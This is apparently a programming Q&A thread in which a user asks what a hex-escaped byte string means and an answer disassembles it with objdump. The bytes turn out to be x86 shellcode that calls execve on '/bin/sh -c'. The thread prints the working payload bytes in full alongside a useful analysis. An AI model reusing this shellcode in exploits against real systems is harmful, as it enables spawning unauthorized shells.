# what is hex version of a command , what does it mean in reality , how is this done

Tags: linux, binary, linux-kernel, hex

I have noticed a command in the form of hex characters and it says this is a hex version of a command (Linux) , what does it actually  mean by hex version ,  How can i convert this to human readable form .
As of now i know  :

- \  :  as an escape sequence
- x : stands for HEX

the command is listed below...

> "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
>   "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
>   "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
>   "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
>   "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
>   "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
>   "\x6e\x2f\x73\x68\x00\x2d\x63\x00"

But how can i convert this to the original command in English like "XXXXXXXX " .

Comment: Is it supposed to be an executable?  What do you mean by "command"?

Comment: Where did you find a command like that? Also, be careful if you are randomly copy-pasting commands without understanding them, especially non-humanly readable commands.

Comment: @CarlNorum ,   "command XXXX" is an example , how to convert it is the question

Comment: @SudiptaChatterjee : k

Comment: @Kajal Where did you find that hex code?  Often in Linux they will use hex code for firmware, which is loaded onto embedded devices, among other things.

Answer (score 3, accepted):

I took that binary and ran it through `hexdump -vC` and `objdump`:

```
$ objdump -b binary -m i386 -D output 

output:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   eb 3e                   jmp    0x40
   2:   5b                      pop    %ebx
   3:   31 c0                   xor    %eax,%eax
   5:   50                      push   %eax
   6:   54                      push   %esp
   7:   5a                      pop    %edx
   8:   83 ec 64                sub    $0x64,%esp
   b:   68 ff ff ff ff          push   $0xffffffff
  10:   68 df d0 df d9          push   $0xd9dfd0df
  15:   68 8d 99 df 81          push   $0x81df998d
  1a:   68 8d 92 df d2          push   $0xd2df928d
  1f:   54                      push   %esp
  20:   5e                      pop    %esi
  21:   f7 16                   notl   (%esi)
  23:   f7 56 04                notl   0x4(%esi)
  26:   f7 56 08                notl   0x8(%esi)
  29:   f7 56 0c                notl   0xc(%esi)
  2c:   83 c4 74                add    $0x74,%esp
  2f:   56                      push   %esi
  30:   8d 73 08                lea    0x8(%ebx),%esi
  33:   56                      push   %esi
  34:   53                      push   %ebx
  35:   54                      push   %esp
  36:   59                      pop    %ecx
  37:   b0 0b                   mov    $0xb,%al
  39:   cd 80                   int    $0x80
  3b:   31 c0                   xor    %eax,%eax
  3d:   40                      inc    %eax
  3e:   eb f9                   jmp    0x39
  40:   e8 bd ff ff ff          call   0x2
  45:   2f                      das    
  46:   62 69 6e                bound  %ebp,0x6e(%ecx)
  49:   2f                      das    
  4a:   73 68                   jae    0xb4
  4c:   00                      .byte 0x0
  4d:   2d                      .byte 0x2d
  4e:   63 00                   arpl   %ax,(%eax)
    ...
$ hexdump -vC output 
00000000  eb 3e 5b 31 c0 50 54 5a  83 ec 64 68 ff ff ff ff  |.>[1.PTZ..dh....|
00000010  68 df d0 df d9 68 8d 99  df 81 68 8d 92 df d2 54  |h....h....h....T|
00000020  5e f7 16 f7 56 04 f7 56  08 f7 56 0c 83 c4 74 56  |^...V..V..V...tV|
00000030  8d 73 08 56 53 54 59 b0  0b cd 80 31 c0 40 eb f9  |.s.VSTY....1.@..|
00000040  e8 bd ff ff ff 2f 62 69  6e 2f 73 68 00 2d 63 00  |...../bin/sh.-c.|
00000050  00                                                |.|
00000051
```

It does look like some kind of program.  First it jumps to offset `0x40` and then uses `call 0x2` to set the stack up; then a bunch of operations including a system call.  Program data appears to start at offset `0x45` and contains the string `"/bin/sh -c"`.

The system call in question is #11 (`mov $0xb,%al`), which according to [this table](http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html) is `sys_execve`.  I'd guess it's trying to run a shell.  Is this code intended to exploit buffer overflows?

Comment: This sounds plausible, but we do not yet know if this is i386 executable code.

Comment: @PeterL. Really?  What are the chances some random data would be valid x86 *and* some other kind of code?

Comment: The chances are actually good that hexcode for other machine architectures are mixed with x86.  This is especially true with device drivers that must load firmware for embedded processors.  That hexcode is pre-compiled for those other processors, and often the source code is unavailable/proprietary.

Comment: I have never heard of such a thing.  Do you have an example of a binary for some other architecture that disassembles as reasonable-looking x86 code?

Comment: This is in another hexdump format (there are a few different industry formats, I can't recall the names at the moment):
http://lxr.free-electrons.com/source/firmware/ti_3410.fw.ihex?v=3.9
An x86 driver I worked on used to load firmware on an 8051 processor via I2C.  That firmware was in the form of hexcode, which was produced from an 8051 compiler.  I'll go look for another example similar to that.

Comment: Here is some code that loads firmware on a USB device, although I have not looked to find that firmware in the open-source tree: http://lxr.free-electrons.com/source/drivers/media/usb/dvb-usb/dvb-usb-firmware.c?v=3.9

Comment: But there is no way that code disassembles into reasonable looking x86 instructions.  It's code for whatever microcontroller is running inside those devices!

Comment: Your first example is an intel hex record, fwiw.

Comment: ...and your second link is also talking about loading code for an 8051, and again, there's no way that binary will disassemble reasonably for x86.  What are you trying to say, exactly?

Comment: Ah, I thought it was Intel hex record but wasn't sure.  What I'm trying to say is that a hex dump is just that... a hex dump representation of raw binary data.  In this case, although we don't have enough info from what was asked, we can probably assume that it is executable code.  What we can't assume is that it is x86 code.  Why would someone use a hex array of x86 code when they are compiling for x86?  Wouldn't it be better to just use assembly if you can't accurately represent the instructions in C?  I understand there are hacking scenarios where that might be useful to use hex.